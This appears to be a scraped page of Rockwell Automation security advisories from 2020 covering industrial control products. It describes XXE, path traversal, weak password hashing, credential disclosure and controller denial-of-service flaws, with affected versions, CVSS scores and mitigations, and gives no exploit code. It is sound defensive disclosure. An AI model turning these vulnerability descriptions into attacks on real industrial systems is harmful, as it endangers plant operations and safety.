Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd(kabyrd@ra.rockwell.com).


ADDITIONAL LINKS

Low
PN1509 | PN1509 | Studio 5000 Logix Designer XML External Entity (XXE) Vulnerability Found During Pwn2Own Competition
Published Date:
August 11, 2020
Last Updated:
August 11, 2020
CVE IDs:
CVE-2020-12025
Products:
Logix Designer
CVSS Scores:
3.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.1
Revision History
Version 1.1 - August 11, 2020. Updated Recommended User Actions
Version 1.0 - July 8, 2020. Initial Version.

Executive Summary

Between January 21-23, 2020, Rockwell Automation participated in the Pwn2Own competition hosted by Trend Micro’s Zero Day Initiative (ZDI). This was ZDI’s first ever Industrial Control Systems (ICS) competition, which was held at the S4 Security conference in Miami, Florida. This competition invites researchers to demonstrate vulnerability exploitation on certain products, and responsibly disclose this information to participating vendors.

During the competition, Rockwell Automation was made aware of an XML External Entity (XXE) flaw in the way the Studio 5000 Logix Designer® software parses AML and RDF files. An attacker may utilize this vulnerability to parse a malicious file, which could result in information disclosure.

Special thanks to The Incite Team for reporting this vulnerability through Pwn2Own. This vulnerability was independently co-discovered by researchers at Claroty after the competition.

Affected Products

Logix Designer Studio 5000 versions 32.00, 32.01, and 32.02.

Vulnerability Details

CVE-2020-12025: XXE Vulnerability Could Lead to Unauthorized Information Disclosure
Logix Designer Studio 5000 utilizes a third-party XML parser, which natively accepts AML and RDF files from any external entity. If successfully exploited, an unauthenticated attacker may be able to craft a malicious file, which when parsed, could lead to some information disclosure of hostnames or other resources from the program.

Other versions of Studio 5000 Logix Designer do not support this parser and therefore, are not affected by this vulnerability. Versions 32.00, 32.01, and 32.02 contains the vulnerable code; however, this vulnerability is considered LOW severity since the exploit relies on user interaction and the limited data that would be provided to the attacker.

CVSSv3 Base Score: 3.6 (LOW)
CVSSv3 Vector String: AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
ZDI Tracking: ZDI-CAN-10290

Risk Mitigation & User Action

Customers using the affected versions of Studio 5000 Logix Designer are encouraged to update to Studio 5000 Logix Designer version v32.03.
Vulnerability Information Recommended User Actions
 CVE-2020-12025
 Update to v32.03 of Logix Designer Studio 5000

Rockwell Automation customers using AML or RDF files should not accept files from unknown sources and remain cautious of social engineering attempts that may take advantage of this vulnerability.

General Security Guidelines

Social Engineering Mitigation Strategies
  • Rockwell Automation customers using AML or RDF files should not accept files from unknown sources and remain cautious of social engineering attempts that may take advantage of this vulnerability.
  • Do not open untrusted AML or RDF files within Studio 5000 Logix Designer.
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).


ADDITIONAL LINKS

High
PN1025 | PN1025 | CompactLogix / Compact GuardLogix 5370 Denial of Service
Published Date:
August 10, 2020
Last Updated:
August 10, 2020
CVE IDs:
CVE-2017-9312
Products:
Armor Compact Logix, Compact GaurdLogix 5370, CompactLogix 5370
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.3
Revision History
Version 1.3 / August 10, 2020 - Updated affected products and suggested actions.
Version 1.2 / May 18, 2020 - Updated release product and corrected product version information.
Version 1.1 / July 12, 2018 - Updated product version informtion.
Version 1.0 / June 21, 2019 - Initial Release
Overview

A vulnerability exists in certain CompactLogix™ 5370 and Compact GuardLogix® 5370 programmable automation controllers that, if successfully exploited, may cause a Denial of Service (DoS) condition. These products are used to control processes across several industries, including without limitation, critical infrastructure; water/wastewater systems; entertainment; food and beverage; and automotive applications. Due to the breadth of platforms potentially affected, Rockwell Automation® has been conducting thorough evaluations to help achieve completeness in its risk assessment and mitigation processes.

Specific details of this vulnerability were disclosed publicly by researchers presenting at the ICS Cyber Security Conference in Singapore on April 25, 2018. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • CompactLogix 5370 L1 controllers, versions 30.014 and earlier, excluding version 28.015
  • CompactLogix 5370 L2 controllers, versions 30.014 and earlier, excluding version 28.015
  • CompactLogix 5370 L3 controllers, versions 30.014 and earlier, excluding version 28.015
  • Armor CompactLogix 5370 L3 controllers, versions 30.014 and earlier, excluding version 28.015
  • Compact GuardLogix 5370 controllers, versions 30.014 and earlier, excluding version 28.015
  • Armor Compact GuardLogix 5370 controllers, versions 30.014 and earlier, excluding version 28.015

Vulnerability Details

This vulnerability may allow threat actor to intentionally send a specific TCP packet to the product and cause a Major Non-Recoverable Fault (MNRF) resulting in a Denial of Service (DoS) condition. An MNRF is a controlled action taken by the controller when it is determined that the controller could no longer continue safe operation. When a Logix controller determines that an MNRF is the right course of action, the controller is designed to fault, taking it out of run mode, logging diagnostic data, and then invalidating and deleting the controller’s memory. This action requires an application program reload to guarantee the controller has a valid program to continue safe operation.

Alexey Perepechko of Applied Risk discovered this vulnerability in the 1769 Compact GuardLogix 5370 controllers. Rockwell Automation further investigated and discovered additional products affected by this vulnerability and they are included in this advisory.

This vulnerability is remotely exploitable. The impact of such an attack would be highly dependent on the nature of the attack, the design of the control system and other controls a user may have in place.

COMPACT GUARDLOGIX ADDITIONAL DETAILS
If a Major Non-Recoverable Fault (MNRF) occurs in a Compact GuardLogix controller, the safety task execution stops and CIP Safety I/O modules are placed into their safe state. All other I/O modules will transition to their configured fault state (for example, Hold Last State). Memory will be marked as invalid and cleared. It is important to note that the memory clear is controlled and intentional, as the controller has determined internally that something is wrong and cannot guarantee continued safe controller execution. As a result, the controller goes into an MNRF state, which is considered safe. Recovery requires that you download the application program again.

COMPACTLOGIX ADDITIONAL DETAILS
If a Major Non-Recoverable Fault (MNRF) occurs in a CompactLogix controller, all I/O modules will transition to their configured fault state (for example, Hold Last State). Memory will be marked as invalid and cleared. It is important to note that the memory clear is controlled and intentional, as the controller has determined internally that something is wrong and cannot guarantee continued safe controller execution. As a result, the controller goes into an MNRF state, which is considered safe. Recovery requires that you download the application program again.

CVE-2017-9312 has been assigned to this vulnerability. Rockwell Automation evaluated the vulnerability using the Common Vulnerability Scoring System (CVSS) v3.0. A CVSS v3 base score of 8.6 has been assigned. For a better understanding of how this score was generated, please follow this link with the CVSS v3 vector string: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H.

Risk Mitigation & User Action

Customers using the affected controllers are encouraged to update to an available firmware revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Product Type Product Family Catalog Numbers Suggested Actions
Small Controllers CompactLogix 5370 L1
CompactLogix 5370 L2
CompactLogix 5370 L3
Armor CompactLogix 5370 L3		 1769-L16ER-BB1B
1769-L18ER-BB1B
1769-L18ERM-BB1B
1769-L19ER-BB1B
1769-L24ER-QB1B
1769-L24ER-QBFC1B
1769-L27ER-QBFC1B
1769-L30ER
1769-L30ER-NSE
1769-L30ERM
1769-L33ER
1769-L33ERM
1769-L36ERM
1769-L37ERMO
 Apply FRN 28.015 or apply 31.011 or later.
Safety Controllers Compact GuardLogix 5370
Armor Compact GuardLogix 5370 L3
 1769-L30ERMS
1769-L33ERMS
1769-L36ERMS
1769-L37ERMS
1769-L38ERMS
1769-L33ERMOS
1769-L36ERMOS
 Apply FRN 28.015 or apply 31.011 or later.

Note: For 1769-L33ERMOS and 1769-L36ERMOS, apply firmware for 1769-L33ERMS and 1769-L36ERMS respectively.

General Security Guidelines

  1. Block all traffic to EtherNet/IP or other CIP protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article ID 898270.
  2. Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  3. When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.
Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.
Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.
We also recommend concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.
Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.
If you have questions regarding this notice, please send an email to our product security inbox at: secure@ra.rockwell.com.

ADDITIONAL LINKS

Attachments

Critical
PN1525 | PN1525 | FactoryTalk Services Platform Improper User Password Hashing
Published Date:
July 30, 2020
Last Updated:
July 30, 2020
CVE IDs:
CVE-2020-14516
Products:
FactoryTalk Services Platform
CVSS Scores:
10.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - July 30, 2020. Initial Release.

Executive Summary

A vulnerability exists in FactoryTalk® Services Platform that prevents user passwords from being hashed properly. This vulnerability, if successfully exploited, may allow attackers to access and modify configuration and application data. This vulnerability only impacts native FactoryTalk Security users, not Windows® linked users.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk Services Platform, versions 6.10.00 and 6.11.00.

Nearly all FactoryTalk software ships with FactoryTalk Services Platform. If you are unsure if you have FactoryTalk Services Platform installed, please see Knowledgebase QA5266 for additional details.

Vulnerability Details

CVE-2020-14516: Improper Implementation of Hashing Algorithm for User Passwords
There is an issue with the implementation of the SHA-256 hashing algorithm with FactoryTalk Services Platform 6.10 and 6.11 that prevents the user password from being hashed properly. A successful exploit could allow a remote, unauthenticated attacker to create new users in the FactoryTalk Services Platform administration console and this new user would allow the attacker to modify or delete configuration and application data in other FactoryTalk software connected to FactoryTalk Services Platform.

CVSS v3.0 Base Score: 10.0/CRITICAL
CVSS v3.0 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected versions of FactoryTalk Services Platform are encouraged to update to an available software version that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these measures with the general security guidelines to employ multiple strategies simultaneously.
Product Family Suggested Actions
FactoryTalk Services Platform Follow the guidance provided in Knowledgebase Article ID: BF10207 in order to patch (link).

General Security Guidelines

  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker application or another similar whitelisting application can help mitigate risk.  Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
  • Ensure that the least-privileged user principle is followed, and the user/service account access to shared resources (such as a database) is only granted with the minimum number of rights as needed.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).


ADDITIONAL LINKS

High
PN1515 | PN1515 | FactoryTalk View SE Credential Disclosure Vulnerabilities
Published Date:
June 25, 2020
Last Updated:
June 25, 2020
CVE IDs:
CVE-2020-14480, CVE-2020-14481
Products:
FactoryTalk View SE
CVSS Scores:
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - June 25, 2020. Initial Release.

Executive Summary

Rockwell Automation received a report from Ilya Karpov and Evgeny Druzhinin who are part of the independent research team, ScadaX Security. They reported two vulnerabilities in FactoryTalk® View Site Edition (SE) software, which if successfully exploited, may result in the disclosure of Windows® Logon credentials (via the DeskLock software) or FactoryTalk View SE user credentials.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

CVE-2020-14480: FactoryTalk View SE versions 9.0 and earlier.
CVE-2020-14481: FactoryTalk View SE version 10.0.

Vulnerability Details

CVE-2020-14480: Cleartext Storage of Sensitive Information in Memory

A local, authenticated attacker may have access to certain credentials, including Windows Logon credentials, as a result of usernames/passwords being stored in plaintext in Random Access Memory (RAM).

CVSS v3.1 Base Score: 8.8/HIGH

CVSS v3.1 Vector String: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE-2020-14481: Use of a Weak Algorithm for Password Protection

The DeskLock tool provided with FactoryTalk View SE uses a weak encryption algorithm that may allow a local, authenticated attacker to decipher user credentials, including the Windows user or Windows DeskLock passwords. If the compromised user has an administrative account, an attacker could gain full access to the user’s operating system and certain components of FactoryTalk View SE.

CVSS v3.1 Base Score: 8.8/HIGH

CVSS v3.1 Vector String: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected versions of DeskLock provided with FactoryTalk View SE are encouraged to update to an available software version that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Product Family Catalog Numbers CVE # Suggested Actions
FactoryTalk View SE 9701-VWSx CVE-2020-14480 Download v10.0 or later.
FactoryTalk View SE 9701-VWSx CVE-2020-14481 Download v11.0 or later.

General Security Guidelines

GENERAL SECURITY GUIDELINES
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).


ADDITIONAL LINKS

High
PN1516 | PN1516 | FactoryTalk Services Platform XXE Vulnerability
Published Date:
June 25, 2020
Last Updated:
June 25, 2020
CVE IDs:
CVE-2020-14478
Products:
FactoryTalk Services Platform
CVSS Scores:
8.4
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - June 25, 2020. Initial Release.

Executive Summary

Rockwell Automation received a report from researchers at Applied Risk regarding a vulnerability in versions of FactoryTalk® Services Platform which if successfully exploited, could lead to a denial-of-service (DoS) condition and to the arbitrary reading of any local file via system-level services.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk Services Platform, versions 6.11.00 and earlier.

Nearly all FactoryTalk® software ships with FactoryTalk Services Platform. If you are unsure if you have FactoryTalk Services Platform installed, please see QA5266 for additional details.

Vulnerability Details

CVE-2020-14478: Weakly Configured XML Parser
A local, authenticated attacker could use an XML External Entity (XXE) attack to exploit weakly configured XML parser to access local or remote content. A successful exploit could potentially cause a denial-of-service (DoS) condition and allow the attacker to arbitrarily read any local file via system-level services. The details of this file could then be forwarded to the attacker.

CVSS v3.0 Base Score: 8.4/HIGH

CVSS v3.0 Vector String: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:H.

Risk Mitigation & User Action

Customers using the affected versions of FactoryTalk Services Platform are encouraged to update to an available software version that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these measures with the general security guidelines to employ multiple strategies simultaneously.
Product Family Suggested Actions
FactoryTalk Services Platform Download patch for 6.11 (Download)

General Security Guidelines

  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker application or another similar whitelisting application can help mitigate risk.  Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329 .
  • Ensure that the least-privileged user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index..

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).


ADDITIONAL LINKS

Critical
PN1507 | PN1507 | FactoryTalk Linx Affected by Multiple Vulnerabilities
Published Date:
June 24, 2020
Last Updated:
June 24, 2020
CVE IDs:
CVE-2020-11999, CVE-2020-12005, CVE-2020-12003, CVE-2020-12001
Products:
FactoryTalk Linx Gateway
CVSS Scores:
7.5, 9.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.1
Revision History
Version 1.1 - June 24, 2020. Corrected affected products.
Version 1.0 - June 11, 2020. Initial Release.

Executive Summary

Rockwell Automation received a report from Claroty, an industrial security product vendor and research company, regarding multiple vulnerabilities due to exposed system internals’ in FactoryTalk® Linxvsoftware. These vulnerabilities, if successfully exploited, may result in arbitrary code execution, information exposure, or denial-of-service conditions.

Rockwell Automation has provided software updates containing the remediation to these vulnerabilities. Customers using the affected versions of these products are encouraged to evaluate the mitigations provided below and apply them appropriately.

Affected Products

  • FactoryTalk Linx software versions 6.00, 6.10, and 6.11
The following products utilize FactoryTalk Linx:
  • Connected Components Workbench™ software v12 and earlier
  • ControlFLASH Plus™ software v1 and later
  • ControlFLASH™ software v14 and later
  • FactoryTalk Asset Centre software v9 and later
  • FactoryTalk Linx CommDTM software v1 and later
  • Studio 5000® Launcher software v31 and later
  • Studio 5000 Logix Designer® software v32 and earlier

Vulnerability Details

CVE-2020-11999: Arbitrary code execution due to API abuse
An exposed API call allows users to provide files to be processed without sanitation. This may allow an attacker to specify a filename to execute unauthorized code and modify files or data.

CVSS v3.1 Base Score: 9.6/10[CRITICAL]
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

CVE-2020-12001: Arbitrary code execution due to path traversal
The parsing mechanism that processes certain file types does not provide input sanitation. This may allow an attacker to use specially crafted files to traverse the file system, modify sensitive data, or execute arbitrary code.

CVSS v3.1 Base Score: 9.6/10[CRITICAL]
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

CVE-2020-12003: Information disclosure due to path traversal
An exposed API call allows users to provide files to be processed without sanitation. This may allow an attacker to use specially crafted requests to traverse the file system and expose sensitive data on the local hard drive.

CVSS v3.1 Base Score: 7.5/10[HIGH]
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2020-12005: Denial-of-service conditions due to unrestricted upload of certain file types
A vulnerability exists in the communication function that enables users to upload EDS files by FactoryTalk Linx. This may allow an attacker to upload a rogue EDS.gz file with “bad compression”, consuming all the available CPU resources leading to denial-of-service (DoS) conditions.

CVSS v3.1 Base Score: 7.5/10[HIGH]
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
CVE Products Affected Mitigation
CVE-2020-11999
CVE-2020-12001
CVE-2020-12003
CVE-2020-12005
  • Connected Components Workbench v12 and earlier
  • ControlFLASH Plus v1 and later
  • ControlFLASH v14 and later
  • FactoryTalk Asset Centre v9 and later
  • FactoryTalk Linx CommDTM v1 and later
  • FactoryTalk Linx software(Previously called RSLinx Enterprise) versions 6.00, 6.10, and 6.11
  • Studio 5000 Launcher v31 and later
  • Studio 5000 Logix Designer v32 and earlier

 Customers are encouraged to apply these patches by following instructions in Knowledgebase articles below:
  • Patch Roll-up fo CPR9. Knowledgebase Article ID: QA49264
  • FactoryTalk Knowledge Linx/Services patch. Knowledgebase Article ID: BF24810
  • FactoryTalk Linx patch. Knoweldgebase Article ID: BF25509

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Block all traffic to EtherNet/IP™ devices or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP Ports 2222, 7153 and UDP Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article ID BF7490.

General Mitigations
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com). Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).

ADDITIONAL LINKS

Critical
PN1511 | PN1511 | FactoryTalk Linx Path Traversal Vulnerability Found During Pwn2Own Competition
Published Date:
June 24, 2020
Last Updated:
June 24, 2020
CVE IDs:
CVE-2020-12001
Products:
FactoryTalk Linx Gateway
CVSS Scores:
9.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.1
Revision History
Version 1.1 - June 24, 2020. Corrected affected products.
Version 1.0 - June 18, 2020. Initial Release.

Executive Summary

Between January 21-23, 2020, Rockwell Automation participated in the Pwn2Own competition hosted by Trend Micro’s Zero Day Initiative (ZDI). This was ZDI’s first ever Industrial Control Systems (ICS) competition, which was held at the S4 Security conference in Miami, Florida. This competition invites researchers to demonstrate vulnerability exploitation on certain products, and responsibly disclose this information to participating vendors.

During the competition, researchers disclosed an open, unauthenticated port which can allow for a directory traversal. This vulnerability was previously disclosed by Rockwell Automation on June 11, 2020.

Special thanks to researchers at Claroty for submitting this issue through Pwn2Own.

Customers using affected products are encouraged to evaluate their own systems and apply the appropriate risk mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures, are provided herein.

Affected Products

  • FactoryTalk® Linx software (previously called RSLinx® Enterprise) versions 6.00, 6.10, and 6.11
The following products utilize FactoryTalk Linx:
  • Connected Components Workbench v12 and earlier
  • ControlFLASH™ Plus v1 and later
  • ControlFLASH™ v14 and later
  • FactoryTalk® Asset Centre v9 and later
  • FactoryTalk® Linx CommDTM v1 and later
  • Studio 5000® Launcher v31 and later
  • Studio 5000 Logix Designer® v32 and earlier

Vulnerability Details

CVE-2020-12001: Arbitrary code execution due to directory traversal
The parsing mechanism that processes certain file types does not provide input sanitation. This may allow an attacker to use specially crafted files to traverse the file system and modify sensitive data or execute arbitrary code.

CVSS v3.1 Base Score: 9.6/10[CRITICAL]
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
ZDI Tracking: ZDI-CAN-10292, ZDI-CAN-10298

Risk Mitigation & User Action

Customers using the affected products are encouraged to apply the patch that addresses the associated risk. Customers who are unable to patch are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Information Recommended User Actions

CVE-2020-12001		 Customers are encouraged to apply these patches by following instructions in Rockwell Automation Knowledgebase articles below:

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

Social Engineering Mitigation Strategies
  • Do not open untrusted files.
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd(kabyrd@ra.rockwell.com).


ADDITIONAL LINKS

High
PN1512 | PN1512 | FactoryTalk Services Platform Vulnerable to Arbitrary COM Instantiation During Pwn2Own Competition
Published Date:
June 18, 2020
Last Updated:
June 18, 2020
CVE IDs:
CVE-2020-12033
Products:
FactoryTalk Services Platform
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - June 18, 2020. Initial Version

Executive Summary

Between January 21-23, 2020, Rockwell Automation participated in the Pwn2Own competition hosted by Trend Micro’s Zero Day Initiative (ZDI). This was ZDI’s first ever Industrial Control Systems (ICS) competition, which was held at the S4 Security conference in Miami, Florida. This competition invites researchers to demonstrate vulnerability exploitation on certain products, and responsibly disclose this information to participating vendors.

During the competition, Rockwell Automation was made aware of a service, which can instantiate a COM object on the affected machine.

Special thanks to researchers at Claroty for submitting this vulnerability through the Pwn2Own competition.

